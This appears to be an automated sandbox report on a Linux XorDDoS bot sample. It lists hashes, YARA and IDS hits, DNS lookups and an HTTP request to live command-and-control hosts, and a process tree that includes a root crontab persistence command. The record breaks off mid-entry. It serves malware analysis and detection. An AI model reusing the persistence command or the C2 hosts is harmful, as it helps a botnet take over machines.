SHA-256:	CEC02A87D2B5B3631EBD5A8A0EA289C4290E6782F2EADBF36E702AA273EDC77C
SHA-512:	A4465692FE25ED080A592CC7934B7100BD664D6423A67A055E0330BC1D6F6D5A96ACE0214E2E15708A20EA78ECFF99786DBC7CF2A755821CA85361B321ACAA14
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wzhmvohlxs, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wzhmvohlxs, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wzhmvohlxs, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wzhmvohlxs, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/zbksjhrfms

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197588932041385
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojR:/fUywKQ7Fb1pNL/p52fjQn36EuR
MD5:	882C9B8E9CE35602DB8FA3BC5ADA4CC0
SHA1:	D2FB281DA33A2D7E6F021384D79887B285EE9A4D
SHA-256:	157FA03A0C3CAEF04419D236AE493BD1D7818FC7E3CA3CD7C86520110497EB5A
SHA-512:	B8895FFA0217C720354E7CDAF76CC8012CB7F38F455202CB6E263AF01E7C4EF292D28842CB056639A2FB166D255879DD2EDC94BA479A4133946A2279977BAC70
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zbksjhrfms, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zbksjhrfms, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zbksjhrfms, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zbksjhrfms, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Entropy (8bit):	6.197537018397919
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	iJl2Sb6qRa
File size:	548638
MD5:	58881cdfffced4e9013ee3ffe4fdc941
SHA1:	425c413c1ab4e1891d85334bdd05ca279ceea127
SHA256:	8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
SHA512:	f4ef3af2332236c07d660a8133d8f345fd7362c2f5ac1a394ef09ec351923902c01481c09b27bca30273b8ecca896047a7b69466f90e65a0dd455c2bc34d644d
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojo:/fUywKQ7Fb1pNL/p52fjQn36Euo
TLSH:	68C45C56E283E2F7C82705B0134BF7BF4620B6359461CD86B7989D5AB9338F22A4D353
File Content Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts.......................... ... ................I..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:
Data:
Version:
Machine:
Version Number:
Type:
OS/ABI:
ABI Version:
Entry Point Address:
Flags:
ELF Header Size:
Program Header Offset:
Program Header Size:
Number of Program Headers:
Section Header Offset:
Section Header Size:
Number of Section Headers:
Header String Table Index:

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	4
.text	PROGBITS	0x8048110	0x110	0x681f8	0x0	0x6	AX	16
__libc_freeres_fn	PROGBITS	0x80b0310	0x68310	0x100f	0x0	0x6	AX	16
__libc_thread_freeres_fn	PROGBITS	0x80b1320	0x69320	0x1db	0x0	0x6	AX	16
.fini	PROGBITS	0x80b14fc	0x694fc	0x1c	0x0	0x6	AX	4
.rodata	PROGBITS	0x80b1520	0x69520	0x152e0	0x0	0x2	A	32
__libc_subfreeres	PROGBITS	0x80c6800	0x7e800	0x30	0x0	0x2	A	4
__libc_atexit	PROGBITS	0x80c6830	0x7e830	0x4	0x0	0x2	A	4
__libc_thread_subfreeres	PROGBITS	0x80c6834	0x7e834	0x8	0x0	0x2	A	4
.eh_frame	PROGBITS	0x80c683c	0x7e83c	0x60a0	0x0	0x2	A	4
.gcc_except_table	PROGBITS	0x80cc8dc	0x848dc	0x11b	0x0	0x2	A	1
.tdata	PROGBITS	0x80cd9f8	0x849f8	0x14	0x0	0x403	WAT	4
.tbss	NOBITS	0x80cda0c	0x84a0c	0x2c	0x0	0x403	WAT	4
.ctors	PROGBITS	0x80cda0c	0x84a0c	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x80cda14	0x84a14	0xc	0x0	0x3	WA	4
.jcr	PROGBITS	0x80cda20	0x84a20	0x4	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x80cda24	0x84a24	0x2c	0x0	0x3	WA	4
.got	PROGBITS	0x80cda50	0x84a50	0x8	0x4	0x3	WA	4
.got.plt	PROGBITS	0x80cda58	0x84a58	0xc	0x4	0x3	WA	4
.data	PROGBITS	0x80cda80	0x84a80	0xb40	0x0	0x3	WA	32
.bss	NOBITS	0x80ce5c0	0x855c0	0x6778	0x0	0x3	WA	32
__libc_freeres_ptrs	NOBITS	0x80d4d38	0x855c0	0x14	0x0	0x3	WA	4
.comment	PROGBITS	0x0	0x855c0	0x422	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x859e2	0x116	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x849f7	0x849f7	6.2040	0x5	R E	0x1000	.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x849f8	0x80cd9f8	0x80cd9f8	0xbc8	0x7354	3.6649	0x6	RW	0x1000	.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4	.note.ABI-tag
TLS	0x849f8	0x80cd9f8	0x80cd9f8	0x14	0x40	2.6610	0x4	R	0x4	.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.2054.36.145.1064643415222020381 04/04/23-19:53:10.224062	TCP	2020381	ET TROJAN DDoS.XOR Checkin	46434	1522	192.168.2.20	54.36.145.106
192.168.2.208.8.8.859877532021326 04/04/23-19:53:10.082524	UDP	2021326	ET TROJAN Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)	59877	53	192.168.2.20	8.8.8.8
192.168.2.20199.59.243.22355892802021336 04/04/23-19:53:10.133352	TCP	2021336	ET TROJAN DDoS.XOR Checkin via HTTP	55892	80	192.168.2.20	199.59.243.223

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2023 19:53:10.113378048 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:10.113981962 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:10.132760048 CEST	80	55892	199.59.243.223	192.168.2.20
Apr 4, 2023 19:53:10.132913113 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:10.133352041 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:10.141346931 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:10.141460896 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:10.143085957 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:10.152129889 CEST	80	55892	199.59.243.223	192.168.2.20
Apr 4, 2023 19:53:10.223905087 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:10.224061966 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:10.251943111 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:10.252202988 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:10.335390091 CEST	80	55892	199.59.243.223	192.168.2.20
Apr 4, 2023 19:53:10.335428953 CEST	80	55892	199.59.243.223	192.168.2.20
Apr 4, 2023 19:53:10.335675001 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:10.335714102 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:10.347790956 CEST	80	55892	199.59.243.223	192.168.2.20
Apr 4, 2023 19:53:10.347932100 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:15.340404034 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:15.362216949 CEST	80	55892	199.59.243.223	192.168.2.20
Apr 4, 2023 19:53:15.362312078 CEST	55892	80	192.168.2.20	199.59.243.223
Apr 4, 2023 19:53:20.350023985 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:20.350192070 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:30.382278919 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:30.382420063 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:40.414480925 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:40.414666891 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:41.541491032 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:41.541671038 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:53:51.572138071 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:53:51.572328091 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:54:01.604254007 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:54:01.604407072 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:54:11.638979912 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:54:11.639096975 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:54:16.628566980 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:54:16.628921032 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:54:26.653979063 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:54:26.654177904 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:54:36.686217070 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:54:36.686359882 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:54:46.718497038 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:54:46.718735933 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:54:51.720493078 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:54:51.720640898 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:55:01.751437902 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:55:01.751599073 CEST	46434	1522	192.168.2.20	54.36.145.106
Apr 4, 2023 19:55:11.783895969 CEST	1522	46434	54.36.145.106	192.168.2.20
Apr 4, 2023 19:55:11.784087896 CEST	46434	1522	192.168.2.20	54.36.145.106

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2023 19:53:10.082524061 CEST	59877	53	192.168.2.20	8.8.8.8
Apr 4, 2023 19:53:10.084041119 CEST	50941	53	192.168.2.20	8.8.8.8
Apr 4, 2023 19:53:10.113106966 CEST	53	50941	8.8.8.8	192.168.2.20
Apr 4, 2023 19:53:10.113738060 CEST	53	59877	8.8.8.8	192.168.2.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 4, 2023 19:53:10.082524061 CEST	192.168.2.20	8.8.8.8	0x3c6d	Standard query (0)	aa.hostasa.org	A (IP address)	IN (0x0001)	false
Apr 4, 2023 19:53:10.084041119 CEST	192.168.2.20	8.8.8.8	0xac2a	Standard query (0)	ppp.gggatat456.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 4, 2023 19:53:10.113106966 CEST	8.8.8.8	192.168.2.20	0xac2a	No error (0)	ppp.gggatat456.com	54.36.145.106	A (IP address)	IN (0x0001)	false
Apr 4, 2023 19:53:10.113106966 CEST	8.8.8.8	192.168.2.20	0xac2a	No error (0)	ppp.gggatat456.com	54.36.15.99	A (IP address)	IN (0x0001)	false
Apr 4, 2023 19:53:10.113106966 CEST	8.8.8.8	192.168.2.20	0xac2a	No error (0)	ppp.gggatat456.com	79.137.1.133	A (IP address)	IN (0x0001)	false
Apr 4, 2023 19:53:10.113106966 CEST	8.8.8.8	192.168.2.20	0xac2a	No error (0)	ppp.gggatat456.com	176.31.91.137	A (IP address)	IN (0x0001)	false
Apr 4, 2023 19:53:10.113106966 CEST	8.8.8.8	192.168.2.20	0xac2a	No error (0)	ppp.gggatat456.com	54.36.15.97	A (IP address)	IN (0x0001)	false
Apr 4, 2023 19:53:10.113106966 CEST	8.8.8.8	192.168.2.20	0xac2a	No error (0)	ppp.gggatat456.com	54.36.145.104	A (IP address)	IN (0x0001)	false
Apr 4, 2023 19:53:10.113738060 CEST	8.8.8.8	192.168.2.20	0x3c6d	No error (0)	aa.hostasa.org	199.59.243.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

aa.hostasa.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.20	55892	199.59.243.223	80

Timestamp	kBytes transferred	Direction	Data
Apr 4, 2023 19:53:10.133352041 CEST	0	OUT	GET /config.rar HTTP/1.1 Accept: / Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322) Host: aa.hostasa.org Connection: Keep-Alive
Apr 4, 2023 19:53:10.335390091 CEST	2	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 04 Apr 2023 17:53:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=5e40ce0e-6449-8a62-0de5-c1f1ec40fdb9; expires=Tue, 04-Apr-2023 18:08:10 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HN/fiQBlsr8tEc/m/6lbpbTguxMTcrFa2wKuYIROzvWRCjgKklCG7F44BwyBKAsElpHFohUkxLzlDHN5S9T6Bw== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 33 35 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 4e 2f 66 69 51 42 6c 73 72 38 74 45 63 2f 6d 2f 36 6c 62 70 62 54 67 75 78 4d 54 63 72 46 61 32 77 4b 75 59 49 52 4f 7a 76 57 52 43 6a 67 4b 6b 6c 43 47 37 46 34 34 42 77 79 42 4b 41 73 45 6c 70 48 46 6f 68 55 6b 78 4c 7a 6c 44 48 4e 35 53 39 54 36 42 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 Data Ascii: 35f<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HN/fiQBlsr8tEc/m/6lbpbTguxMTcrFa2wKuYIROzvWRCjgKklCG7F44BwyBKAsElpHFohUkxLzlDHN5S9T6Bw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect
Apr 4, 2023 19:53:10.335428953 CEST	3	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNWU0MGNlMGUtNjQ0OS04YTYyLTBkZTUtYzFmMWVjNDBmZGI5IiwicGFnZV90aW1lIjoxNjgwNjMwNzkwLCJwYWdlX3VybCI6Imh0dHA6XC9cL
Apr 4, 2023 19:53:10.347790956 CEST	4	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNWU0MGNlMGUtNjQ0OS04YTYyLTBkZTUtYzFmMWVjNDBmZGI5IiwicGFnZV90aW1lIjoxNjgwNjMwNzkwLCJwYWdlX3VybCI6Imh0dHA6XC9cL

System Behavior

Analysis Process: iJl2Sb6qRa PID: 9451, Parent PID: 9383

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	/tmp/iJl2Sb6qRa
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9452, Parent PID: 9451

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9454, Parent PID: 9452

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9457, Parent PID: 9454

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9462, Parent PID: 9452

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9463, Parent PID: 9462

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: update-rc.d PID: 9463, Parent PID: 9462

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/usr/sbin/update-rc.d
Arguments:	/usr/bin/perl /usr/sbin/update-rc.d iJl2Sb6qRa defaults
File size:	14437 bytes
MD5 hash:	e9e125904f9ed8ff4c8504a55a149005

Chronological Activities

Analysis Process: update-rc.d PID: 9490, Parent PID: 9463

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/usr/sbin/update-rc.d
Arguments:	n/a
File size:	14437 bytes
MD5 hash:	e9e125904f9ed8ff4c8504a55a149005

Chronological Activities

Analysis Process: insserv PID: 9490, Parent PID: 9463

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/usr/lib/insserv/insserv
Arguments:	/usr/lib/insserv/insserv iJl2Sb6qRa
File size:	56512 bytes
MD5 hash:	34c11674a0b29347001640aeae7c94f1

Chronological Activities

Analysis Process: update-rc.d PID: 9543, Parent PID: 9463

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/usr/sbin/update-rc.d
Arguments:	n/a
File size:	14437 bytes
MD5 hash:	e9e125904f9ed8ff4c8504a55a149005

Chronological Activities

Analysis Process: systemctl PID: 9543, Parent PID: 9463

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	659848 bytes
MD5 hash:	b08096235b8c90203e17721264b5ce40

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9474, Parent PID: 9452

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: dash PID: 9474, Parent PID: 9452

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/bin/dash
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	154072 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: dash PID: 9479, Parent PID: 9474

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/bin/dash
Arguments:	n/a
File size:	154072 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: sed PID: 9479, Parent PID: 9474

General

Start time:	19:53:09
Start date:	04/04/2023
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	73424 bytes
MD5 hash:	c1a00c583ba08e728b10f3f46f5776d6

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9552, Parent PID: 9452

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9553, Parent PID: 9552

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: lsodknzpps PID: 9553, Parent PID: 9552

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/usr/bin/lsodknzpps
Arguments:	/usr/bin/lsodknzpps ls 9452
File size:	548649 bytes
MD5 hash:	a48ef1e0784bbcadf9025524cdf26387

Chronological Activities

Analysis Process: lsodknzpps PID: 9554, Parent PID: 9553

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/usr/bin/lsodknzpps
Arguments:	n/a
File size:	548649 bytes
MD5 hash:	a48ef1e0784bbcadf9025524cdf26387

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9563, Parent PID: 9452

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9564, Parent PID: 9563

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: lsodknzpps PID: 9564, Parent PID: 9563

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/usr/bin/lsodknzpps
Arguments:	/usr/bin/lsodknzpps sh 9452
File size:	548649 bytes
MD5 hash:	a48ef1e0784bbcadf9025524cdf26387

Chronological Activities

Analysis Process: lsodknzpps PID: 9565, Parent PID: 9564

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/usr/bin/lsodknzpps
Arguments:	n/a
File size:	548649 bytes
MD5 hash:	a48ef1e0784bbcadf9025524cdf26387

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9574, Parent PID: 9452

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9575, Parent PID: 9574

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: lsodknzpps PID: 9575, Parent PID: 9574

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/usr/bin/lsodknzpps
Arguments:	/usr/bin/lsodknzpps su 9452
File size:	548649 bytes
MD5 hash:	a48ef1e0784bbcadf9025524cdf26387

Chronological Activities

Analysis Process: lsodknzpps PID: 9576, Parent PID: 9575

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/usr/bin/lsodknzpps
Arguments:	n/a
File size:	548649 bytes
MD5 hash:	a48ef1e0784bbcadf9025524cdf26387

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9585, Parent PID: 9452

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: iJl2Sb6qRa PID: 9586, Parent PID: 9585

General

Start time:	19:53:14
Start date:	04/04/2023
Path:	/tmp/iJl2Sb6qRa
Arguments:	n/a
File size:	548638 bytes
MD5 hash:	58881cdfffced4e9013ee3ffe4fdc941

Chronological Activities

Analysis Process: lsodknzpps PID: 9586, Parent PID: 9585

General

Start time:	19:53:14
